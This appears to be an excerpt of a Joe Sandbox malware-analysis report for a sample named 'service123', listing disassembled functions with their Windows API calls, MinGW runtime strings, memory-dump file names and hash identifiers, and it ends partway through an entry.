Instruction ID: 744862265192c7c2ccbb6602adf4b1f9ff147f7ac71e15ee3e185872625e49c1
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: 7F21B874A0421E9BCF14EF64C8819DEB7B5AB89358F1488A8DD0977B51D730AE49CF90

Function 6C220310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2E395F), ref: 6C22034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2E395F), ref: 6C220352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C2E395F), ref: 6C220360

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 606e1b0973eff5c4822965aabc9dbb497a072f39eacfb9f8ca869a7fcff8dd63
Instruction ID: 90400a8f799114248069cd8a451e14c46913cc62243df1e91127aac4388d2c39
Opcode Fuzzy Hash: 606e1b0973eff5c4822965aabc9dbb497a072f39eacfb9f8ca869a7fcff8dd63
Instruction Fuzzy Hash: C3517E7060978ACFCB10DF28C5D865A77F5BB8A304F15852CEC489B710DB38E845CB92

Function 006C1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 006C196F
vfprintf.MSVCRT ref: 006C198F
abort.MSVCRT ref: 006C1994
VirtualQuery.KERNEL32 ref: 006C1A2B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 006C1AD7
VirtualProtect failed with code 0x%x, xrefs: 006C1AA6
Address %p has no image-section, xrefs: 006C1AEB
Mingw-w64 runtime failure:, xrefs: 006C1968

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: ef9f86fdc58983038f1c3372ec87a8d772d3944a7e8886d12ea8771138f88e8a
Instruction ID: f24728bf6c33451b6e0832da81f33177cd30c7a2108becaf1efd4922545feb59
Opcode Fuzzy Hash: ef9f86fdc58983038f1c3372ec87a8d772d3944a7e8886d12ea8771138f88e8a
Instruction Fuzzy Hash: 6B517BB1504300DFC710EF69D885B6AFBE2FF86354F49892DE8898B312D734E8458B96

Function 6C21A690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C21A6BF
vfprintf.MSVCRT ref: 6C21A6DF
abort.MSVCRT ref: 6C21A6E4
VirtualQuery.KERNEL32 ref: 6C21A77B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6C21A827
Mingw-w64 runtime failure:, xrefs: 6C21A6B8
Address %p has no image-section, xrefs: 6C21A83B
VirtualProtect failed with code 0x%x, xrefs: 6C21A7F6

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: d129c4bed7fb7b031c2e5221cbfac4f95aa62b86c5b28efec1be2cc5b2600860
Instruction ID: c944266445e7c82f8cd4e77cd00a293925b620e7ae4d70e1edf08b8c9f04b2ce
Opcode Fuzzy Hash: d129c4bed7fb7b031c2e5221cbfac4f95aa62b86c5b28efec1be2cc5b2600860
Instruction Fuzzy Hash: 245159B1908309DFC710EF28C58168AFBF4BF85368F55891DE9988BB50D734E44ACB92

Function 6C21E0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2d993d26096736a8e05718daa2703183de10064dc19636f36ad7bc4213809cad
Instruction ID: a1ad921f6fb126a4d8096a7817448f5458ecf7073314e6ea4935d33c155855ac
Opcode Fuzzy Hash: 2d993d26096736a8e05718daa2703183de10064dc19636f36ad7bc4213809cad
Instruction Fuzzy Hash: 4C21F63235921D8FC704CE5CDC8199673E6FBC632872881BEEA488BF55D637A846C790

Function 6C21E570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 700d73ec53c36cf00239ceb7ef09e79d314cc44776712160492e6abd7d8d5bfb
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 8041F47050C30F8AD310DF28C88866AB7E1AF82314F944A19FDA487E95E334C94E8BD2

Function 6C21E59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 766b8e2f31a63a7db73f7c3d74136ae998d177aa834af3a7cca362c396efec4b
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 0E21E77050D30F4BD710DE24C89866AB7D5AF81319FA44E09FDA497E45E334D84A8BD2

Function 6C21E714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 81ef9e08e09a60e5ced5a71128c874c742bb698a3ed7f9b1176ebc43d4f8c567
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 0EE0867049C25E8AC610DE28C859995B7D59F9A348B804806EED597D14D730D94FCAC2

Function 6C229249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C229260
GetProcAddress.KERNEL32 ref: 6C22927A
LoadLibraryW.KERNEL32 ref: 6C22929F
GetProcAddress.KERNEL32 ref: 6C2292B3

Strings

rand_s, xrefs: 6C22926F
advapi32.dll, xrefs: 6C229298
SystemFunction036, xrefs: 6C2292A8
msvcrt.dll, xrefs: 6C229255

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 83ab6fbcc619597a9254c65b7f968ec08e09f7f456033c41f9ff9a289299d623
Instruction ID: e27881cb817b9680d21a4f03a5e247bc7485e0dfbbb23f4bafad447f1928034d
Opcode Fuzzy Hash: 83ab6fbcc619597a9254c65b7f968ec08e09f7f456033c41f9ff9a289299d623
Instruction Fuzzy Hash: 73F04FB1994348CBCB10FF78864A20AFBF4BB46320F010A2CD8D897200D634D424CB67

Function 6C2AF8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AF95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AF988
memmove.MSVCRT ref: 6C2AF9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AFA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AFA58

Strings

basic_string::_M_replace, xrefs: 6C2AFBB6

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 0361fb680a069ac7798b734358cdcfc1e2e89ccb55d8e955248788dd58844234
Instruction ID: 15282db8e812e841df8a3aa70239dd29f51038525f9898fb60ef82c21780ea31
Opcode Fuzzy Hash: 0361fb680a069ac7798b734358cdcfc1e2e89ccb55d8e955248788dd58844234
Instruction Fuzzy Hash: EF8145706093569FC301DF6CC09056EFBE1AF8A344F24881EE8D597725D33AD889CB92

Function 6C21FEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2200D2
WaitForSingleObject.KERNEL32 ref: 6C220117

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 36c54982b9baf2a696c09ba0c24637eb7f2bfc7296b48cd0399a6b3015c2b3b5
Instruction ID: 5126155e4cf69657abd79ae5fbec4a39b429e43c148130ca97a56bbe5226d2ec
Opcode Fuzzy Hash: 36c54982b9baf2a696c09ba0c24637eb7f2bfc7296b48cd0399a6b3015c2b3b5
Instruction Fuzzy Hash: 91619D3070938ECFDB20DF69C554757B7F4AB4A309F008529ED2897A80DBB8D949CB52

Function 6C21E760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: cd986cb78b9121dfda74def082bb13cd2e418b25b6ca48e53f107842f514d299
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: 2501CE74A1D21E8FD700DA18C884A9AF7E5AB99314F104929FD859BE14D234E8CBC7C2

Function 006C2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006C2CC1

Strings

o, xrefs: 006C30A8
0, xrefs: 006C313E

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: 9f32d5434f2cdc9398d542b5eb85e355162b10b6ece4f5ca0a88494184af0db6
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: 3CF15C71A0421A8FCB15CF68C490BADBBF2FF98360F19822DE855AB351D734E945CB90

Function 6C2232C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C223391

Strings

o, xrefs: 6C223778
0, xrefs: 6C22380E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 5bfc172cdee82135538c9c9db7ae6acd9f287c5bff497b3a94374abe12970ff8
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: B8F17475A0420D8FCB01CF68C4806DDBBF6BF89364F198269EC94AB755D738E945CB90

Function 006C14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006C14F0
LoadLibraryA.KERNEL32 ref: 006C1506
GetProcAddress.KERNEL32 ref: 006C1525
GetProcAddress.KERNEL32 ref: 006C1537

Strings

__register_frame_info, xrefs: 006C151A
__deregister_frame_info, xrefs: 006C152C
libgcc_s_dw2-1.dll, xrefs: 006C14E9, 006C14FF

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: bc7451c6e1aa2f9fc1507b4204fcb77fde2ea26be5c5a45e9ed82414158d2280
Instruction ID: 83375ebf3130173f9f954b8fe501cc19405640dbbfd6ee9d43672cab6a40c643
Opcode Fuzzy Hash: bc7451c6e1aa2f9fc1507b4204fcb77fde2ea26be5c5a45e9ed82414158d2280
Instruction Fuzzy Hash: EF0171B19052448BC3007FB8A909B3DBFF6EB46358F45552DD5898B201E77184188BA3

Function 6C2113E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C2113F0
LoadLibraryA.KERNEL32 ref: 6C211406
GetProcAddress.KERNEL32 ref: 6C211425
GetProcAddress.KERNEL32 ref: 6C211437

Strings

__deregister_frame_info, xrefs: 6C21142C
__register_frame_info, xrefs: 6C21141A
libgcc_s_dw2-1.dll, xrefs: 6C2113E9, 6C2113FF

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

